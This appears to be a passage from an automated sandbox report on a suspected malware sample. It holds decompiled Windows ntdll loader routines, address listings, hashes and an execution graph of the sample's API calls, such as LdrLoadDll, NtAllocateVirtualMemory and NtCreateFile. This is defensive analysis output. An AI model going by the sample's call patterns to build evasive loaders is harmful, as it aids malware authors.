													_t111 =  *(_t72 + 4);
													_t56 = _t72 - 8; // 0xfffffff6
													_t107 = _t56;
													if( *((intOrPtr*)(_t107 + 4)) != 0) {
														goto L33;
													} else {
														_t102 =  *_t72;
														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
															_push(3);
															asm("int 0x29");
															_t104 = 0x3f;
															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
																_t72 = _t72 + 8;
															}
															_t112 =  *0x1d8365e4; // 0x76d6f0e0
															 *0x1d8391e0(_t107, _t72,  &_v8);
															_t113 =  *_t112();
															if(_t113 >= 0) {
																L18:
																_t89 = _v8;
																if(_t89 != 0) {
																	if( *(_t110 + 0x48) != _t97) {
																		E1D7426A0(_t89,  *(_t110 + 0x48));
																		_t89 = _v8;
																	}
																	 *(_t110 + 0x48) = _t89;
																}
																if(_t113 < 0) {
																	if(( *0x1d8337c0 & 0x00000003) != 0) {
																		E1D7BE692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
																	}
																	if(( *0x1d8337c0 & 0x00000010) != 0) {
																		asm("int3");
																	}
																}
																return _t113;
															} else {
																if(_t113 != 0xc000008a) {
																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
																		goto L16;
																	} else {
																		if(_t113 != 0xc00000bb) {
																			goto L18;
																		} else {
																			goto L16;
																		}
																	}
																	goto L53;
																} else {
																	L16:
																	if(( *0x1d8337c0 & 0x00000005) != 0) {
																		_push(_t113);
																		_t67 = _t110 + 0x24; // 0x123
																		E1D7BE692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
																		_t115 = _t115 + 0x1c;
																	}
																	_t113 = _t97;
																}
																goto L18;
															}
														} else {
															 *_t111 = _t102;
															 *(_t102 + 4) = _t111;
															E1D753BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
															goto L33;
														}
													}
													goto L53;
													L33:
													_t72 = _t111;
												} while (_t111 != _t110);
											}
										}
									}
								}
								goto L12;
							}
						}
						goto L53;
					}
					goto L12;
				}
				L53:
			}





























                                                                                                                              0x1d774b79
                                                                                                                              0x1d774b86
                                                                                                                              0x1d774b88
                                                                                                                              0x1d774b8e
                                                                                                                              0x1d774b90
                                                                                                                              0x1d774b93
                                                                                                                              0x1d774b97
                                                                                                                              0x1d774c27
                                                                                                                              0x1d774c35
                                                                                                                              0x1d774ba7
                                                                                                                              0x1d774ba7
                                                                                                                              0x1d774baa
                                                                                                                              0x1d774bac
                                                                                                                              0x1d774bb2
                                                                                                                              0x1d774bb2
                                                                                                                              0x1d774bb5
                                                                                                                              0x1d774bbc
                                                                                                                              0x1d7b330f
                                                                                                                              0x1d7b3316
                                                                                                                              0x1d7b3317
                                                                                                                              0x1d7b331e
                                                                                                                              0x1d7b3321
                                                                                                                              0x1d7b3324
                                                                                                                              0x1d7b3327
                                                                                                                              0x1d7b332a
                                                                                                                              0x1d7b3331
                                                                                                                              0x1d7b3334
                                                                                                                              0x1d7b3339
                                                                                                                              0x1d7b333e
                                                                                                                              0x1d7b333e
                                                                                                                              0x1d774bca
                                                                                                                              0x1d7b3344
                                                                                                                              0x1d7b334b
                                                                                                                              0x1d7b334c
                                                                                                                              0x1d7b3353
                                                                                                                              0x1d7b3356
                                                                                                                              0x1d7b335d
                                                                                                                              0x1d7b3360
                                                                                                                              0x1d7b3363
                                                                                                                              0x1d7b336a
                                                                                                                              0x1d7b336d
                                                                                                                              0x1d7b3372
                                                                                                                              0x1d7b3372
                                                                                                                              0x1d774bd0
                                                                                                                              0x1d774bd0
                                                                                                                              0x1d774bd5
                                                                                                                              0x1d774c36
                                                                                                                              0x1d774c36
                                                                                                                              0x00000000
                                                                                                                              0x1d774bd7
                                                                                                                              0x1d774bd7
                                                                                                                              0x1d774bd7
                                                                                                                              0x1d774bdf
                                                                                                                              0x00000000
                                                                                                                              0x1d774be1
                                                                                                                              0x1d774be3
                                                                                                                              0x1d774bec
                                                                                                                              0x1d774bef
                                                                                                                              0x1d774bf0
                                                                                                                              0x1d774bf9
                                                                                                                              0x1d774bfd
                                                                                                                              0x1d774bff
                                                                                                                              0x1d774c04
                                                                                                                              0x1d774c06
                                                                                                                              0x1d774c07
                                                                                                                              0x1d774c0a
                                                                                                                              0x1d774c0c
                                                                                                                              0x1d774c0f
                                                                                                                              0x1d774c1a
                                                                                                                              0x1d774c1c
                                                                                                                              0x1d774c21
                                                                                                                              0x1d7b337a
                                                                                                                              0x1d7b337a
                                                                                                                              0x1d7b337d
                                                                                                                              0x1d7b337d
                                                                                                                              0x1d7b3384
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3386
                                                                                                                              0x1d7b3386
                                                                                                                              0x1d7b338b
                                                                                                                              0x1d7b33b2
                                                                                                                              0x1d7b33b5
                                                                                                                              0x1d7b33b9
                                                                                                                              0x1d7b33be
                                                                                                                              0x1d7b33f7
                                                                                                                              0x1d7b33f7
                                                                                                                              0x1d774c76
                                                                                                                              0x1d774c84
                                                                                                                              0x1d774c8c
                                                                                                                              0x1d774c90
                                                                                                                              0x1d774ca9
                                                                                                                              0x1d774ca9
                                                                                                                              0x1d774cae
                                                                                                                              0x1d774ce4
                                                                                                                              0x1d774cee
                                                                                                                              0x1d774cf3
                                                                                                                              0x1d774cf3
                                                                                                                              0x1d774ce6
                                                                                                                              0x1d774ce6
                                                                                                                              0x1d774cb2
                                                                                                                              0x1d7b3463
                                                                                                                              0x1d7b347b
                                                                                                                              0x1d7b3480
                                                                                                                              0x1d7b348a
                                                                                                                              0x1d7b3490
                                                                                                                              0x1d7b3490
                                                                                                                              0x1d7b348a
                                                                                                                              0x1d774cbe
                                                                                                                              0x1d774c92
                                                                                                                              0x1d774c98
                                                                                                                              0x1d774cc5
                                                                                                                              0x00000000
                                                                                                                              0x1d7b3423
                                                                                                                              0x1d7b3429
                                                                                                                              0x00000000
                                                                                                                              0x1d7b342f
                                                                                                                              0x00000000
                                                                                                                              0x1d7b342f
                                                                                                                              0x1d7b3429
                                                                                                                              0x00000000
                                                                                                                              0x1d774c9a
                                                                                                                              0x1d774c9a
                                                                                                                              0x1d774ca1
                                                                                                                              0x1d7b3434
                                                                                                                              0x1d7b3435
                                                                                                                              0x1d7b344f
                                                                                                                              0x1d7b3454
                                                                                                                              0x1d7b3454
                                                                                                                              0x1d774ca7
                                                                                                                              0x1d774ca7
                                                                                                                              0x00000000
                                                                                                                              0x1d774c98
                                                                                                                              0x1d7b3391
                                                                                                                              0x1d7b3398
                                                                                                                              0x1d7b339c
                                                                                                                              0x1d7b33a2
                                                                                                                              0x00000000
                                                                                                                              0x1d7b33a2
                                                                                                                              0x1d7b338b
                                                                                                                              0x00000000
                                                                                                                              0x1d7b33a7
                                                                                                                              0x1d7b33a7
                                                                                                                              0x1d7b33a9
                                                                                                                              0x1d7b33ad
                                                                                                                              0x1d774c21
                                                                                                                              0x1d774c1a
                                                                                                                              0x1d774c04
                                                                                                                              0x00000000
                                                                                                                              0x1d774bfd
                                                                                                                              0x1d774bdf
                                                                                                                              0x00000000
                                                                                                                              0x1d774bd5
                                                                                                                              0x00000000
                                                                                                                              0x1d774bac
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0$Flst
                                                                                                                              • API String ID: 0-758220159
                                                                                                                              • Opcode ID: 7fb2fc2299c392e9c148633052e952f565ac2e0348a9045b039bdcdadd674dd3
                                                                                                                              • Instruction ID: cc53f2b27e67c6cbf5f425c25747f7db91977ee45feeda20a1961fe7afe53fc6
                                                                                                                              • Opcode Fuzzy Hash: 7fb2fc2299c392e9c148633052e952f565ac2e0348a9045b039bdcdadd674dd3
                                                                                                                              • Instruction Fuzzy Hash: 885189B1A00299CBDF15CF94C4887ADFBF4FF44729F15882BD4499B251E7709981CB82
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D740485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 66%
                                                                                                                              			E1D740485(intOrPtr* __ecx) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t50;
				intOrPtr* _t51;
				intOrPtr* _t73;
				intOrPtr _t76;
				char _t84;
				void* _t85;
				intOrPtr _t86;
				intOrPtr* _t89;

				_t89 = __ecx;
				_t76 =  *[fs:0x30];
				_t73 =  *0x1d836630; // 0x0
				_v32 = 0;
				_v28 = 0;
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
				_v12 = _t76;
				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
				_t84 = 0;
				if(_t73 == 0) {
					_t73 = E1D7482E0(0xabababab, 0, "kLsE", 0);
					 *0x1d836630 = _t73;
					if(_t73 != 0) {
						goto L1;
					}
					L4:
					_t85 = _t84 - 1;
					if(_t85 == 0) {
						 *((intOrPtr*)(_t89 + 8)) = 2;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
						L19:
						 *((intOrPtr*)(_t89 + 4)) = 6;
						L6:
						_t86 = _v12;
						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
						if(_t51 == 0 ||  *_t51 == 0) {
							L8:
							 *((short*)(_t89 + 0x14)) = 0;
							goto L9;
						} else {
							_t38 = _t89 + 0x14; // 0x130
							if(E1D765C3F(_t38, 0x100, _t51) >= 0) {
								L9:
								if( *_t89 != 0x11c) {
									if( *_t89 != 0x124) {
										L16:
										return 0;
									}
								}
								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
								 *(_t89 + 0x118) = E1D740670();
								if( *_t89 == 0x124) {
									 *(_t89 + 0x11c) = E1D740670() & 0x0001ffff;
								}
								 *((char*)(_t89 + 0x11a)) = 0;
								if(E1D740630( &_v16) != 0) {
									 *((char*)(_t89 + 0x11a)) = _v16;
								}
								E1D785050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
								_push( &_v24);
								_push(4);
								_push( &_v8);
								_push( &_v20);
								_push( &_v32);
								if(E1D783EE0() >= 0) {
									if(_v8 == 1) {
										if(_v20 != 4 || _v24 != 4) {
											goto L15;
										} else {
											goto L16;
										}
									}
									L15:
									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
									if( *_t89 == 0x124) {
										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
									}
								}
								goto L16;
							}
							goto L8;
						}
					}
					if(_t85 == 1) {
						 *((intOrPtr*)(_t89 + 8)) = 3;
						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
						goto L19;
					}
					goto L6;
				}
				L1:
				if(_t73 != E1D740690) {
					 *0x1d8391e0();
					_t50 =  *_t73();
				} else {
					_t50 = E1D740690();
				}
				_t84 = _t50;
				goto L4;
			}


















                                                                                                                              0x1d74048f
                                                                                                                              0x1d740493
                                                                                                                              0x1d74049a
                                                                                                                              0x1d7404a0
                                                                                                                              0x1d7404a3
                                                                                                                              0x1d7404a6
                                                                                                                              0x1d7404af
                                                                                                                              0x1d7404b8
                                                                                                                              0x1d7404c2
                                                                                                                              0x1d7404cb
                                                                                                                              0x1d7404ce
                                                                                                                              0x1d7404d2
                                                                                                                              0x1d7404d6
                                                                                                                              0x1d74060e
                                                                                                                              0x1d740610
                                                                                                                              0x1d740618
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7404ef
                                                                                                                              0x1d7404ef
                                                                                                                              0x1d7404f2
                                                                                                                              0x1d7405e3
                                                                                                                              0x1d7405ea
                                                                                                                              0x1d7405f1
                                                                                                                              0x1d7405f1
                                                                                                                              0x1d740501
                                                                                                                              0x1d740501
                                                                                                                              0x1d740504
                                                                                                                              0x1d74050c
                                                                                                                              0x1d740519
                                                                                                                              0x1d74051b
                                                                                                                              0x00000000
                                                                                                                              0x1d79e99c
                                                                                                                              0x1d79e9a2
                                                                                                                              0x1d79e9ac
                                                                                                                              0x1d74051f
                                                                                                                              0x1d74052a
                                                                                                                              0x1d79e9b9
                                                                                                                              0x1d7405cd
                                                                                                                              0x1d7405d3
                                                                                                                              0x1d7405d3
                                                                                                                              0x1d79e9bf
                                                                                                                              0x1d74053c
                                                                                                                              0x1d74054d
                                                                                                                              0x1d740559
                                                                                                                              0x1d740562
                                                                                                                              0x1d79e9ce
                                                                                                                              0x1d79e9ce
                                                                                                                              0x1d74056a
                                                                                                                              0x1d74057b
                                                                                                                              0x1d740580
                                                                                                                              0x1d740580
                                                                                                                              0x1d74058f
                                                                                                                              0x1d740597
                                                                                                                              0x1d740598
                                                                                                                              0x1d74059d
                                                                                                                              0x1d7405a1
                                                                                                                              0x1d7405a5
                                                                                                                              0x1d7405ad
                                                                                                                              0x1d7405b3
                                                                                                                              0x1d79e9dd
                                                                                                                              0x00000000
                                                                                                                              0x1d79e9ed
                                                                                                                              0x00000000
                                                                                                                              0x1d79e9ed
                                                                                                                              0x1d79e9dd
                                                                                                                              0x1d7405b9
                                                                                                                              0x1d7405be
                                                                                                                              0x1d7405c7
                                                                                                                              0x1d79e9f2
                                                                                                                              0x1d79e9f2
                                                                                                                              0x1d7405c7
                                                                                                                              0x00000000
                                                                                                                              0x1d7405ad
                                                                                                                              0x00000000
                                                                                                                              0x1d79e9b2
                                                                                                                              0x1d74050c
                                                                                                                              0x1d7404fb
                                                                                                                              0x1d79e989
                                                                                                                              0x1d79e990
                                                                                                                              0x00000000
                                                                                                                              0x1d79e990
                                                                                                                              0x00000000
                                                                                                                              0x1d7404fb
                                                                                                                              0x1d7404dc
                                                                                                                              0x1d7404e2
                                                                                                                              0x1d7405d6
                                                                                                                              0x1d7405dc
                                                                                                                              0x1d7404e8
                                                                                                                              0x1d7404e8
                                                                                                                              0x1d7404e8
                                                                                                                              0x1d7404ed
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D740586
                                                                                                                              • kLsE, xrefs: 1D7405FE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                              • API String ID: 3446177414-2547482624
                                                                                                                              • Opcode ID: b97abe73145b092a3391798ccf538bb11c1d8c9cfb743d0b217deeacea37754d
                                                                                                                              • Instruction ID: 4356adc8991849a07ecef32bca23e54ecfe96115ac1af9d8498c82d97014b3a2
                                                                                                                              • Opcode Fuzzy Hash: b97abe73145b092a3391798ccf538bb11c1d8c9cfb743d0b217deeacea37754d
                                                                                                                              • Instruction Fuzzy Hash: 4351BA75A00756DFC717DFA8C485AAAB7F4EF44320F20C82ED69A87251E734A504CBA3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73DF21 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 25%
                                                                                                                              			E1D73DF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t49;
				intOrPtr _t50;
				intOrPtr* _t52;
				char _t56;
				void* _t69;
				char _t72;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t82;
				void* _t84;
				intOrPtr _t86;
				void* _t88;
				signed int _t90;
				signed int _t92;
				signed int _t93;

				_t80 = __edx;
				_t92 = (_t90 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1d83b370 ^ _t92;
				_t72 = 0;
				_v72 = __edx;
				_t82 = __ecx;
				_t86 =  *((intOrPtr*)(__edx + 0xc8));
				_v68 = _t86;
				E1D788F40( &_v60, 0, 0x30);
				_t48 =  *((intOrPtr*)(_t82 + 0x70));
				_t93 = _t92 + 0xc;
				_v76 = _t48;
				_t49 = _t48;
				if(_t49 == 0) {
					_push(5);
					 *((char*)(_t82 + 0x6a)) = 0;
					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
					goto L3;
				} else {
					_t69 = _t49 - 1;
					if(_t69 != 0) {
						if(_t69 == 1) {
							_push(0xa);
							goto L3;
						} else {
							_t56 = 0;
						}
					} else {
						_push(4);
						L3:
						_pop(_t50);
						_v80 = _t50;
						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
							L1D752330(_t50, _t86 + 0x1c);
							_t79 = _v72;
							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
							E1D7524D0(_t86 + 0x1c);
						}
						_t75 = _v80;
						_t52 =  *((intOrPtr*)(_v72 + 0x20));
						_t80 =  *_t52;
						_v72 =  *((intOrPtr*)(_t52 + 4));
						_v52 =  *((intOrPtr*)(_t82 + 0x68));
						_v60 = 0x30;
						_v56 = _t75;
						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
						asm("movsd");
						_v76 = _t80;
						_v64 = 0x30;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t80 != 0) {
							 *0x1d8391e0(_t75, _v72,  &_v64,  &_v60);
							_t72 = _v76();
						}
						_t56 = _t72;
					}
				}
				_pop(_t84);
				_pop(_t88);
				_pop(_t73);
				return E1D784B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
			}


































                                                                                                                              0x1d73df21
                                                                                                                              0x1d73df29
                                                                                                                              0x1d73df33
                                                                                                                              0x1d73df3b
                                                                                                                              0x1d73df40
                                                                                                                              0x1d73df44
                                                                                                                              0x1d73df46
                                                                                                                              0x1d73df52
                                                                                                                              0x1d73df56
                                                                                                                              0x1d73df5b
                                                                                                                              0x1d73df5e
                                                                                                                              0x1d73df61
                                                                                                                              0x1d73df65
                                                                                                                              0x1d73df67
                                                                                                                              0x1d73e058
                                                                                                                              0x1d73e05a
                                                                                                                              0x1d73e05d
                                                                                                                              0x00000000
                                                                                                                              0x1d73df6d
                                                                                                                              0x1d73df6d
                                                                                                                              0x1d73df70
                                                                                                                              0x1d79d6ea
                                                                                                                              0x1d79d6f3
                                                                                                                              0x00000000
                                                                                                                              0x1d79d6ec
                                                                                                                              0x1d79d6ec
                                                                                                                              0x1d79d6ec
                                                                                                                              0x1d73df76
                                                                                                                              0x1d73df76
                                                                                                                              0x1d73df78
                                                                                                                              0x1d73df78
                                                                                                                              0x1d73df79
                                                                                                                              0x1d73df80
                                                                                                                              0x1d73e019
                                                                                                                              0x1d73e024
                                                                                                                              0x1d73e02c
                                                                                                                              0x1d73e032
                                                                                                                              0x1d73e03b
                                                                                                                              0x1d73e045
                                                                                                                              0x1d73e04b
                                                                                                                              0x1d73e04e
                                                                                                                              0x1d73e04e
                                                                                                                              0x1d73df8d
                                                                                                                              0x1d73df91
                                                                                                                              0x1d73df94
                                                                                                                              0x1d73df99
                                                                                                                              0x1d73dfa0
                                                                                                                              0x1d73dfab
                                                                                                                              0x1d73dfb3
                                                                                                                              0x1d73dfb7
                                                                                                                              0x1d73dfbb
                                                                                                                              0x1d73dfbc
                                                                                                                              0x1d73dfc0
                                                                                                                              0x1d73dfc8
                                                                                                                              0x1d73dfc9
                                                                                                                              0x1d73dfca
                                                                                                                              0x1d73dfcd
                                                                                                                              0x1d73dfe0
                                                                                                                              0x1d73dfea
                                                                                                                              0x1d73dfea
                                                                                                                              0x1d73dfec
                                                                                                                              0x1d73dfec
                                                                                                                              0x1d73df70
                                                                                                                              0x1d73dff2
                                                                                                                              0x1d73dff3
                                                                                                                              0x1d73dff4
                                                                                                                              0x1d73dfff

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID: 0$0
                                                                                                                              • API String ID: 3446177414-203156872
                                                                                                                              • Opcode ID: 23b79b99b168834879dec569761020d373104f1ea3bab0bc308e04d2878fda3a
                                                                                                                              • Instruction ID: 3488139fac4efee2bf551250d5609b3fca7e08abaec5bc0c07cc4867bd5812c6
                                                                                                                              • Opcode Fuzzy Hash: 23b79b99b168834879dec569761020d373104f1ea3bab0bc308e04d2878fda3a
                                                                                                                              • Instruction Fuzzy Hash: D2416BB1608746AFC300CF28D484A5ABBE4BB8C764F044A6EF588DB341D771EA05CB97
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.9%
                                                                                                                              Dynamic/Decrypted Code Coverage:1.9%
                                                                                                                              Signature Coverage:0%
                                                                                                                              Total number of Nodes:724
                                                                                                                              Total number of Limit Nodes:85
                                                                                                                              execution_graph 89699 549070 89710 54bd30 89699->89710 89701 54918c 89702 5490ab 89702->89701 89713 53ace0 89702->89713 89706 5490fd 89706->89701 89707 549110 Sleep 89706->89707 89722 548c90 LdrLoadDll 89706->89722 89723 548ea0 LdrLoadDll 89706->89723 89707->89706 89724 54a530 89710->89724 89712 54bd5d 89712->89702 89714 53ad04 89713->89714 89715 53ad40 LdrLoadDll 89714->89715 89716 53ad0b 89714->89716 89715->89716 89717 544e40 89716->89717 89718 544e5a 89717->89718 89719 544e4e 89717->89719 89718->89706 89719->89718 89731 5452c0 LdrLoadDll 89719->89731 89721 544fac 89721->89706 89722->89706 89723->89706 89727 54af50 89724->89727 89726 54a54c NtAllocateVirtualMemory 89726->89712 89728 54af60 89727->89728 89730 54af82 89727->89730 89729 544e40 LdrLoadDll 89728->89729 89729->89730 89730->89726 89731->89721 89732 54f18d 89735 54b9c0 89732->89735 89736 54b9e6 89735->89736 89743 539d30 89736->89743 89738 54b9f2 89739 54ba16 89738->89739 89751 538f30 89738->89751 89789 54a6a0 89739->89789 89792 539c80 89743->89792 89745 539d3d 89746 539d44 89745->89746 89804 539c20 89745->89804 89746->89738 89752 538f57 89751->89752 90201 53b1b0 89752->90201 89754 538f69 90205 53af00 89754->90205 89756 538f86 89763 538f8d 89756->89763 90276 53ae30 LdrLoadDll 89756->90276 89758 5390f2 89758->89739 89760 538ffc 90221 53f400 89760->90221 89762 539006 89762->89758 89764 54bf80 2 API calls 89762->89764 89763->89758 90209 53f370 89763->90209 89765 53902a 89764->89765 89766 54bf80 2 API calls 89765->89766 89767 53903b 89766->89767 89768 54bf80 2 API calls 89767->89768 89769 53904c 89768->89769 90233 53ca80 89769->90233 89771 539059 89772 544a40 8 API calls 89771->89772 89773 539066 89772->89773 89774 544a40 8 API calls 89773->89774 89775 539077 89774->89775 89776 5390a5 89775->89776 89777 539084 89775->89777 89778 544a40 8 API calls 89776->89778 90243 53d610 89777->90243 89786 5390c1 89778->89786 89781 5390e9 89783 538d00 23 API calls 89781->89783 89783->89758 89784 539092 90259 538d00 89784->90259 89786->89781 90277 53d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 89786->90277 89790 54a6bf 89789->89790 89791 54af50 LdrLoadDll 89789->89791 89791->89790 89793 539c93 89792->89793 89843 548bb0 LdrLoadDll 89792->89843 89823 548a60 89793->89823 89796 539ca6 89796->89745 89797 539c9c 89797->89796 89826 54b2a0 89797->89826 89799 539ce3 89799->89796 89837 539aa0 89799->89837 89801 539d03 89844 539620 LdrLoadDll 89801->89844 89803 539d15 89803->89745 90179 54b590 89804->90179 89807 54b590 LdrLoadDll 89808 539c4b 89807->89808 89809 54b590 LdrLoadDll 89808->89809 89810 539c61 89809->89810 89811 53f170 89810->89811 89812 53f189 89811->89812 90183 53b030 89812->90183 89814 53f19c 90187 54a1d0 89814->90187 89817 539d55 89817->89738 89819 53f1c2 89820 53f1ed 89819->89820 90194 54a250 89819->90194 89821 54a480 2 API calls 89820->89821 89821->89817 89845 54a5f0 89823->89845 89827 54b2b9 89826->89827 89848 544a40 89827->89848 89829 54b2d1 89830 54b2da 89829->89830 89887 54b0e0 89829->89887 89830->89799 89832 54b2ee 89832->89830 89905 549ef0 89832->89905 90157 537ea0 89837->90157 89839 539ac1 89839->89801 89840 539aba 89840->89839 90170 538160 89840->90170 89843->89793 89844->89803 89846 54af50 LdrLoadDll 89845->89846 89847 548a75 89846->89847 89847->89797 89849 544d75 89848->89849 89859 544a54 89848->89859 89849->89829 89852 544b80 89916 54a350 89852->89916 89853 544b63 89973 54a450 LdrLoadDll 89853->89973 89856 544ba7 89858 54bdb0 2 API calls 89856->89858 89857 544b6d 89857->89829 89860 544bb3 89858->89860 89859->89849 89913 549c40 89859->89913 89860->89857 89861 544d39 89860->89861 89862 544d4f 89860->89862 89867 544c42 89860->89867 89863 54a480 2 API calls 89861->89863 89982 544780 LdrLoadDll NtReadFile NtClose 89862->89982 89865 544d40 89863->89865 89865->89829 89866 544d62 89866->89829 89868 544ca9 89867->89868 89870 544c51 89867->89870 89868->89861 89869 544cbc 89868->89869 89975 54a2d0 89869->89975 89872 544c56 89870->89872 89873 544c6a 89870->89873 89974 544640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 89872->89974 89876 544c87 89873->89876 89877 544c6f 89873->89877 89876->89865 89931 544400 89876->89931 89919 5446e0 89877->89919 89879 544c60 89879->89829 89882 544d1c 89979 54a480 89882->89979 89883 544c7d 89883->89829 89884 544c9f 89884->89829 89886 544d28 89886->89829 89888 54b0f1 89887->89888 89889 54b103 89888->89889 89890 54bd30 2 API calls 89888->89890 89889->89832 89891 54b124 89890->89891 90002 544060 89891->90002 89893 54b170 89893->89832 89894 54b147 89894->89893 89895 544060 3 API calls 89894->89895 89897 54b169 89895->89897 89897->89893 90034 545380 89897->90034 89898 54b1fa 89899 54b20a 89898->89899 90128 54aef0 LdrLoadDll 89898->90128 90044 54ad60 89899->90044 89902 54b238 90123 549eb0 89902->90123 89906 54af50 LdrLoadDll 89905->89906 89907 549f0c 89906->89907 90151 46a2b2a 89907->90151 89908 549f27 89910 54bdb0 89908->89910 90154 54a660 89910->90154 89912 54b349 89912->89799 89914 54af50 LdrLoadDll 89913->89914 89915 544b34 89914->89915 89915->89852 89915->89853 89915->89857 89917 54af50 LdrLoadDll 89916->89917 89918 54a36c NtCreateFile 89917->89918 89918->89856 89920 5446fc 89919->89920 89921 54a2d0 LdrLoadDll 89920->89921 89922 54471d 89921->89922 89923 544724 89922->89923 89924 544738 89922->89924 89925 54a480 2 API calls 89923->89925 89926 54a480 2 API calls 89924->89926 89927 54472d 89925->89927 89928 544741 89926->89928 89927->89883 89983 54bfc0 89928->89983 89930 54474c 89930->89883 89932 54447e 89931->89932 89933 54444b 89931->89933 89935 5445c9 89932->89935 89939 54449a 89932->89939 89934 54a2d0 LdrLoadDll 89933->89934 89936 544466 89934->89936 